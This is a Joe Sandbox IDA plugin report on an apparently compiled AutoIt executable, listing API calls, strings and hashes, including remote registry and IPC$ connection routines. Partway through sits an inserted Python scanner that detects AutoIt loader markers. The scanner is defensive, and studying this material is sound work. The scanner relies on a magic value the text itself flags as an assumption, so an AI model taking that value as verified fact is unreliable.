                                                            • Opcode ID: 0b8ab394bd76c5f341b431b387eff3ff7311a7ec5871a78a02f9057dfad7f24a
                                                            • Instruction ID: cf1a7b2b66ba0a8a2588edcc6b638a9a57c9cf8ba01f641d146ad773d0efe2cf
                                                            • Opcode Fuzzy Hash: 0b8ab394bd76c5f341b431b387eff3ff7311a7ec5871a78a02f9057dfad7f24a
                                                            • Instruction Fuzzy Hash: 9531F2B1D483196BDF109FB69C8996FBFE8FF08750F50452AA50DE7281DA78A5008FA1
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D54424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D5446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-383632319
                                                            • Opcode ID: 432e60353af8fcd6527d3f89bec40528310dbf6a6ea0fba9628ca5c2b9b385bc
                                                            • Instruction ID: 496461d5f54ba09e83fda9e1cb1ceae2f4e01fd5839b4da1b270dd26e73bab7d
                                                            • Opcode Fuzzy Hash: 432e60353af8fcd6527d3f89bec40528310dbf6a6ea0fba9628ca5c2b9b385bc
                                                            • Instruction Fuzzy Hash: 69919F342047019FCB04EF10C861A6EB7E1EF95758F144869FD965B3A2DB30ED49EBA2
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D5B8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00D56B11,?), ref: 00D5B910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D5B949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D5B98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D5B9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 00D5B9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D5B9DF
                                                            • DestroyIcon.USER32(?), ref: 00D5B9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D5BA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D5BA17
                                                              • Part of subcall function 00CF2EFD: __wcsicmp_l.LIBCMT ref: 00CF2F86
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl$@U=u
                                                            • API String ID: 1212759294-1639919054
                                                            • Opcode ID: ffaa4ef8fd55eb322a19f2fe9ab496cae33c446497b60e50424b8e6cf18880b2
                                                            • Instruction ID: 32a11105f3e8f0e2632d0f3b844dbf2e273e37f45dbfecad2a9a9ca92dec5bff
                                                            • Opcode Fuzzy Hash: ffaa4ef8fd55eb322a19f2fe9ab496cae33c446497b60e50424b8e6cf18880b2
                                                            • Instruction Fuzzy Hash: 1061BE71900319BAEF14DF64DC46FBA7BA8EB08722F104516FE15DA1D0DB74A984EBB0
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 00D3A3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 00D3A418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D3A4C5
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 274124014543512a62cf5b9f2ff5ac596cfaa373e462a3aa85e1340e79fd12f6
                                                            • Instruction ID: d4832f2c61550c3a0e0ba218db99ce0be6ff1a6bed672c0affeb926c6c3499cb
                                                            • Opcode Fuzzy Hash: 274124014543512a62cf5b9f2ff5ac596cfaa373e462a3aa85e1340e79fd12f6
                                                            • Instruction Fuzzy Hash: D9517E711043049FC700EF24C99186AB3F4EF84718F54896EF98A973A1DB31ED0ADBA2
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00D0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00D2F8DF
                                                            • LoadStringW.USER32(00000000,?,00D0E029,00000001), ref: 00D2F8E8
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • GetModuleHandleW.KERNEL32(00000000,00D95310,?,00000FFF,?,?,00D0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00D2F90A
                                                            • LoadStringW.USER32(00000000,?,00D0E029,00000001), ref: 00D2F90D
                                                            • __swprintf.LIBCMT ref: 00D2F95D
                                                            • __swprintf.LIBCMT ref: 00D2F96E
                                                            • _wprintf.LIBCMT ref: 00D2FA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D2FA2E
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: 2b0d422ff26110c6e95883f2149356c10e4916b9ffa3bfa78f963e94f6406efc
                                                            • Instruction ID: 84bf1f7dd7cd11068074a9b099eba2bfbd72c9b2d2cb73f9ad6f33afb39c1162
                                                            • Opcode Fuzzy Hash: 2b0d422ff26110c6e95883f2149356c10e4916b9ffa3bfa78f963e94f6406efc
                                                            • Instruction Fuzzy Hash: B6413B72804219AACF04FBE4DD96EEE7778AF14300F500566B605B6292EA316F49DB71
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 00D3DA10
                                                            • _wcscat.LIBCMT ref: 00D3DA28
                                                            • _wcscat.LIBCMT ref: 00D3DA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D3DA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3DA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00D3DA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D3DA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3DAA7
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: ffcf11ea5949c338d78b3368e6b5ea3d3c74d4a8743f33f05c8356e439e89b0d
                                                            • Instruction ID: ca0c7aceac900db4375c355baa7698ab35511dcac533d123d4b43a9ae7d83202
                                                            • Opcode Fuzzy Hash: ffcf11ea5949c338d78b3368e6b5ea3d3c74d4a8743f33f05c8356e439e89b0d
                                                            • Instruction Fuzzy Hash: 318190725043419FCB64EF64D840AAAB7EAFF89710F18482EF889CB251E630D944DF72
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D5C1FC
                                                            • GetFocus.USER32 ref: 00D5C20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00D5C217
                                                            • _memset.LIBCMT ref: 00D5C342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D5C36D
                                                            • GetMenuItemCount.USER32(?), ref: 00D5C38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00D5C3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D5C3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D5C41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D5C454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D5C489
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 45e5a7720d755468fa01c81190361ebd4df01cc60f6e8d917273f8ba3a22d494
                                                            • Instruction ID: 7c76aa914febdebb96ccece7fea9f6d9e14630375868ec509fa9e48c14ff8faa
                                                            • Opcode Fuzzy Hash: 45e5a7720d755468fa01c81190361ebd4df01cc60f6e8d917273f8ba3a22d494
                                                            • Instruction Fuzzy Hash: CF818C702183059FEB11CF14D884A6BBBE8EB88715F04592EFD9597291D770E908CB72
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00D4738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00D4739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 00D473A7
                                                            • SelectObject.GDI32(00000000,?), ref: 00D473B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00D47408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00D47444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00D47468
                                                            • SelectObject.GDI32(00000006,?), ref: 00D47470
                                                            • DeleteObject.GDI32(?), ref: 00D47479
                                                            • DeleteDC.GDI32(00000006), ref: 00D47480
                                                            • ReleaseDC.USER32(00000000,?), ref: 00D4748B
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 9ceae62306657f4453ffa00f0bbdbd526a116f16977a757c2ea41723044ae41f
                                                            • Instruction ID: fb99ed0a98f5a631f3f8538171fc2d6ee483dd451e981ad523dd0d13debf56b1
                                                            • Opcode Fuzzy Hash: 9ceae62306657f4453ffa00f0bbdbd526a116f16977a757c2ea41723044ae41f
                                                            • Instruction Fuzzy Hash: BC513875904309EFCB14CFA8CC89EAEBBB9EF48710F148429F99997351C731A9408B60
                                                            APIs
                                                            • timeGetTime.WINMM ref: 00D34F7A
                                                              • Part of subcall function 00CF049F: timeGetTime.WINMM(?,753DB400,00CE0E7B), ref: 00CF04A3
                                                            • Sleep.KERNEL32(0000000A), ref: 00D34FA6
                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00D34FCA
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D34FEC
                                                            • SetActiveWindow.USER32 ref: 00D3500B
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D35019
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D35038
                                                            • Sleep.KERNEL32(000000FA), ref: 00D35043
                                                            • IsWindow.USER32 ref: 00D3504F
                                                            • EndDialog.USER32(00000000), ref: 00D35060
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: @U=u$BUTTON
                                                            • API String ID: 1194449130-2582809321
                                                            • Opcode ID: f28518ce158b9e542d47b9d28087630d4ba3cc44fda01a1da3bb868a3f40413b
                                                            • Instruction ID: 6246f0462efaf31f184de9efadfdfb5b4d9a52bc050b82e4d11424f12555dec8
                                                            • Opcode Fuzzy Hash: f28518ce158b9e542d47b9d28087630d4ba3cc44fda01a1da3bb868a3f40413b
                                                            • Instruction Fuzzy Hash: E2218E71204705AFE7515F20FC89B2A3BA9EB4A746F0A1035F901C63B5DB72DD509B72
                                                            APIs
                                                              • Part of subcall function 00CF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00CD6B0C,?,00008000), ref: 00CF0973
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CD6BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CD6CFA
                                                              • Part of subcall function 00CD586D: _wcscpy.LIBCMT ref: 00CD58A5
                                                              • Part of subcall function 00CF363D: _iswctype.LIBCMT ref: 00CF3645
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: dff791aaa311216a384e14f38ac2d96b25e4cd0ae2bb13802c430de900d58235
                                                            • Instruction ID: 9521b074eff892f99eae31f9d8dafc7918c97adcd8a37ac4c83d356d75a47c52
                                                            • Opcode Fuzzy Hash: dff791aaa311216a384e14f38ac2d96b25e4cd0ae2bb13802c430de900d58235
                                                            • Instruction Fuzzy Hash: FE02AD311083409FC724EF24C881AAFBBE5EF94314F144D1EF69A972A2DB31D949DB62
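The strings tied to this function ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<", "#include depth exceeded ...", "Bad directive syntax error") belong to the AutoIt v3 runtime's script loader, which is the cleanest static tell that an executable is a compiled AutoIt script rather than hand-written native code. The scanner below is an added example, not part of the Joe Sandbox report or of the sample: it searches a file for those loader strings in both ASCII and UTF-16LE (the runtime uses the wide-character Win32 APIs throughout, as the W-suffixed calls above show) and for the 16-byte EA06 resource magic used by public AutoIt unpackers. That magic constant, the name `scan_autoit_markers`, the scoring rule in `likely_compiled_autoit`, and the `SAMPLE_BLOB` are all my own assumptions and constructions, not values taken from this report.

```python
"""Flag a PE as a probable compiled AutoIt v3 script from loader markers.

Added example; none of this is the analysed sample's code. The marker strings
are those the report lists for the script-loader function; the resource magic
is an ASSUMPTION taken from public AutoIt unpackers, not from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Loader strings from the report. The report lists "AU3!" and "EA06" as two
# separate strings, so they are matched separately (adjacency is not required).
LOADER_STRINGS = (
    "AU3!",
    "EA06",
    ">>>AUTOIT SCRIPT<<<",
    "#include depth exceeded. Make sure there are no recursive includes",
    "Bad directive syntax error",
)

# ASSUMPTION: 16-byte magic that precedes an EA06 script blob, as used by
# public AutoIt unpackers. Not present in the report; keep as a secondary signal.
EA06_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530C87D885DA")


@dataclass
class AutoItScan:
    """Offsets of every marker found, keyed by the marker string."""
    hits: dict[str, list[int]] = field(default_factory=dict)
    magic_offsets: list[int] = field(default_factory=list)

    @property
    def likely_compiled_autoit(self) -> bool:
        # Either the resource magic, or the "AU3!"/"EA06" pair together with the
        # resource name. A lone "AU3!" is too short to be meaningful on its own.
        pair = "AU3!" in self.hits and "EA06" in self.hits
        return bool(self.magic_offsets) or (pair and ">>>AUTOIT SCRIPT<<<" in self.hits)


def _encodings(text: str) -> list[bytes]:
    # Narrow and wide forms: the AutoIt runtime stores most literals as UTF-16LE.
    return [text.encode("ascii"), text.encode("utf-16-le")]


def scan_autoit_markers(data: bytes) -> AutoItScan:
    """Search a byte blob for the loader strings and the EA06 magic."""
    result = AutoItScan()
    for marker in LOADER_STRINGS:
        offsets: list[int] = []
        for needle in _encodings(marker):
            offsets.extend(m.start() for m in re.finditer(re.escape(needle), data))
        if offsets:
            result.hits[marker] = sorted(offsets)
    result.magic_offsets = [m.start() for m in re.finditer(re.escape(EA06_MAGIC), data)]
    return result


def scan_file(path: str) -> AutoItScan:
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# Constructed stand-in for a binary (NOT bytes from the sample): a fake MZ
# header, the resource name as UTF-16LE, the two loader strings, then the magic.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 60
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\x00" * 8
    + b"AU3!EA06" + b"\x00" * 8
    + EA06_MAGIC + b"\x01\x02\x03"
)

if __name__ == "__main__":
    import sys

    scan = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_autoit_markers(SAMPLE_BLOB)
    for name, offsets in scan.hits.items():
        print(f"{name!r}: {[hex(o) for o in offsets]}")
    print("EA06 magic at:", [hex(o) for o in scan.magic_offsets])
    print("likely compiled AutoIt:", scan.likely_compiled_autoit)
```

Run it as `python scan_autoit.py <file.exe>` to check a real binary, or with no argument to scan the constructed blob. The verdict deliberately needs more than one marker: packed or partially overwritten stubs can lose the resource magic, and "AU3!" alone is four bytes that will appear by chance in large files, so the resource-name string is required alongside the pair.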
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00D32DDD
                                                            • GetMenuItemCount.USER32(00D95890), ref: 00D32E66
                                                            • DeleteMenu.USER32(00D95890,00000005,00000000,000000F5,?,?), ref: 00D32EF6
                                                            • DeleteMenu.USER32(00D95890,00000004,00000000), ref: 00D32EFE
                                                            • DeleteMenu.USER32(00D95890,00000006,00000000), ref: 00D32F06
                                                            • DeleteMenu.USER32(00D95890,00000003,00000000), ref: 00D32F0E
                                                            • GetMenuItemCount.USER32(00D95890), ref: 00D32F16
                                                            • SetMenuItemInfoW.USER32(00D95890,00000004,00000000,00000030), ref: 00D32F4C
                                                            • GetCursorPos.USER32(?), ref: 00D32F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 00D32F5F
                                                            • TrackPopupMenuEx.USER32(00D95890,00000000,?,00000000,00000000,00000000), ref: 00D32F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D32F7E
                                                             Memory Dump Source
                                                             • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: b4416c4292f4296165c77866a9a603850baf09b194c996367ac59535e6b86f64
                                                            • Instruction ID: 76d459eb24e5410dd54242c50d40cdea4361d173c2f6e1b25b7213622dbef41b
                                                            • Opcode Fuzzy Hash: b4416c4292f4296165c77866a9a603850baf09b194c996367ac59535e6b86f64
                                                            • Instruction Fuzzy Hash: A471B370A40305BAEB219F55DC86FBABF64FF04764F144226F625AA1E1C7B1A810DBB4
                                                            APIs
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • _memset.LIBCMT ref: 00D2786B
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D278A0
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D278BC
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D278D8
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D27902
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00D2792A
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D27935
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D2793A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1411258926-22481851
                                                            • Opcode ID: 031cc128f5947f9379cede4cb7f9162b0e29f762f758c8176b53761fbcc21c31
                                                            • Instruction ID: d15a3204cb464bb47d5355bdf5865b39a9706150e333a08726475f9743a69373
                                                            • Opcode Fuzzy Hash: 031cc128f5947f9379cede4cb7f9162b0e29f762f758c8176b53761fbcc21c31
                                                            • Instruction Fuzzy Hash: B9411972C14229ABCF21EBA4DC85DEEB778FF14350F04416AF905A72A1EA319D05DBA0
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
